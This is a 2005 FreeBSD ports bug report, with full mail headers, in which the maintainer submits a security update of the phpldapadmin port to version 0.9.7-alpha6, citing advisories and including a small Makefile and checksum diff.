From owner-freebsd-ports-bugs@FreeBSD.ORG  Thu Sep  1 13:00:41 2005
Return-Path: <owner-freebsd-ports-bugs@FreeBSD.ORG>
X-Original-To: freebsd-ports-bugs@hub.freebsd.org
Delivered-To: freebsd-ports-bugs@hub.freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id 8996016A41F
	for <freebsd-ports-bugs@hub.freebsd.org>;
	Thu,  1 Sep 2005 13:00:41 +0000 (GMT)
	(envelope-from gnats@FreeBSD.org)
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
	by mx1.FreeBSD.org (Postfix) with ESMTP id 3E71643D46
	for <freebsd-ports-bugs@hub.freebsd.org>;
	Thu,  1 Sep 2005 13:00:40 +0000 (GMT)
	(envelope-from gnats@FreeBSD.org)
Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1])
	by freefall.freebsd.org (8.13.3/8.13.3) with ESMTP id j81D0eUm024406
	for <freebsd-ports-bugs@freefall.freebsd.org>;
	Thu, 1 Sep 2005 13:00:40 GMT
	(envelope-from gnats@freefall.freebsd.org)
Received: (from gnats@localhost)
	by freefall.freebsd.org (8.13.3/8.13.1/Submit) id j81D0eaE024405;
	Thu, 1 Sep 2005 13:00:40 GMT (envelope-from gnats)
Resent-Date: Thu, 1 Sep 2005 13:00:40 GMT
Resent-Message-Id: <200509011300.j81D0eaE024405@freefall.freebsd.org>
Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer)
Resent-To: freebsd-ports-bugs@FreeBSD.org
Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org,
	Matthew Seaman <m.seaman@infracaninophile.co.uk>
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id CD89C16A41F;
	Thu,  1 Sep 2005 12:55:25 +0000 (GMT)
	(envelope-from matthew@thebunker.net)
Received: from male.aldigital.co.uk (male.thebunker.net [213.129.64.13])
	by mx1.FreeBSD.org (Postfix) with ESMTP id 60B1C43D48;
	Thu,  1 Sep 2005 12:55:25 +0000 (GMT)
	(envelope-from matthew@thebunker.net)
Received: from lack-of-gravitas.thebunker.net (gateway.ash.thebunker.net
	[213.129.64.4])
	(using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by male.aldigital.co.uk (Postfix) with ESMTP
	id 4C997976EF; Thu,  1 Sep 2005 13:55:23 +0100 (BST)
Received: from lack-of-gravitas.thebunker.net (localhost [127.0.0.1])
	by lack-of-gravitas.thebunker.net (8.13.4/8.13.4) with ESMTP id
	j81CtNVo097539; Thu, 1 Sep 2005 13:55:23 +0100 (BST)
	(envelope-from matthew@lack-of-gravitas.thebunker.net)
Received: (from matthew@localhost)
	by lack-of-gravitas.thebunker.net (8.13.4/8.13.4/Submit) id
	j81CtMPl097538; Thu, 1 Sep 2005 13:55:22 +0100 (BST)
	(envelope-from matthew)
Message-Id: <200509011255.j81CtMPl097538@lack-of-gravitas.thebunker.net>
Date: Thu, 1 Sep 2005 13:55:22 +0100 (BST)
From: Matthew Seaman <m.seaman@infracaninophile.co.uk>
To: FreeBSD-gnats-submit@FreeBSD.org
X-Send-Pr-Version: 3.113
Cc: security-team@FreeBSD.org
Subject: ports/85567: [maintainer] net/phpldapadmin -- security update to
	0.9.7-alpha6
X-BeenThere: freebsd-ports-bugs@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
Reply-To: Matthew Seaman <m.seaman@infracaninophile.co.uk>
List-Id: Ports bug reports <freebsd-ports-bugs.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-ports-bugs>, 
	<mailto:freebsd-ports-bugs-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-ports-bugs>
List-Post: <mailto:freebsd-ports-bugs@freebsd.org>
List-Help: <mailto:freebsd-ports-bugs-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-ports-bugs>, 
	<mailto:freebsd-ports-bugs-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Thu, 01 Sep 2005 13:00:41 -0000


>Number:         85567
>Category:       ports
>Synopsis:       [maintainer] net/phpldapadmin -- security update to 0.9.7-alpha6
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    freebsd-ports-bugs
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          maintainer-update
>Submitter-Id:   current-users
>Arrival-Date:   Thu Sep 01 13:00:39 GMT 2005
>Closed-Date:
>Last-Modified:
>Originator:     Matthew Seaman
>Release:        FreeBSD 6.0-BETA3 i386
>Organization:
Infracaninophile
>Environment:
System: FreeBSD lack-of-gravitas.thebunker.net 6.0-BETA3 FreeBSD 6.0-BETA3 #3: Tue Aug 30 13:36:31 BST 2005 root@lack-of-gravitas.thebunker.net:/usr/obj/usr/src/sys/LACK-OF-GRAVITAS i386


	
>Description:

Security update to version 0.9.7-alpha6 which closes the
vulnerabilities mentioned in:

    http://secunia.com/advisories/16617/
    http://secunia.com/advisories/16611/

(16617 in particular allows remote access to arbitrary files on the
web server or uploading files from an arbitrary location and executing
them in the context of the PHP interpreter in the httpd.  Nasty.)

The following patches can be applied as a workaround if you don't want
to upgrade from 0.9.6c just yet:

    http://cvs.sourceforge.net/viewcvs.py/phpldapadmin/phpldapadmin/login.php?r1=1.45&r2=1.46
    http://cvs.sourceforge.net/viewcvs.py/phpldapadmin/phpldapadmin/welcome.php?r1=1.20&r2=1.21


>How-To-Repeat:
	
>Fix:

	

--- phpldapadmin.diff begins here ---
diff -Nur /usr/ports/net/phpldapadmin/Makefile phpldapadmin/Makefile
--- /usr/ports/net/phpldapadmin/Makefile	Tue Jun 14 08:48:53 2005
+++ phpldapadmin/Makefile	Thu Sep  1 13:22:39 2005
@@ -6,11 +6,12 @@
 #
 
 PORTNAME=	phpldapadmin
-PORTVERSION=	0.9.6c
+PORTVERSION=	0.9.7.a6
 PORTEPOCH=	1
 CATEGORIES=	net www
 MASTER_SITES=	${MASTER_SITE_SOURCEFORGE}
 MASTER_SITE_SUBDIR=	phpldapadmin
+DISTNAME=	${PORTNAME}-${PORTVERSION:C/\.a(.)/-alpha\1/}
 
 MAINTAINER=	m.seaman@infracaninophile.co.uk
 COMMENT=	A set of PHP-scripts to administer LDAP servers over the web
diff -Nur /usr/ports/net/phpldapadmin/distinfo phpldapadmin/distinfo
--- /usr/ports/net/phpldapadmin/distinfo	Tue Jun  7 09:00:11 2005
+++ phpldapadmin/distinfo	Thu Sep  1 13:23:03 2005
@@ -1,2 +1,2 @@
-MD5 (phpldapadmin-0.9.6c.tar.gz) = 8404fa6f0ad3185cc9353c94bf44ae56
-SIZE (phpldapadmin-0.9.6c.tar.gz) = 707109
+MD5 (phpldapadmin-0.9.7-alpha6.tar.gz) = 08109739708f5b00c197422fb883a7b9
+SIZE (phpldapadmin-0.9.7-alpha6.tar.gz) = 739882
--- phpldapadmin.diff ends here ---


>Release-Note:
>Audit-Trail:
>Unformatted: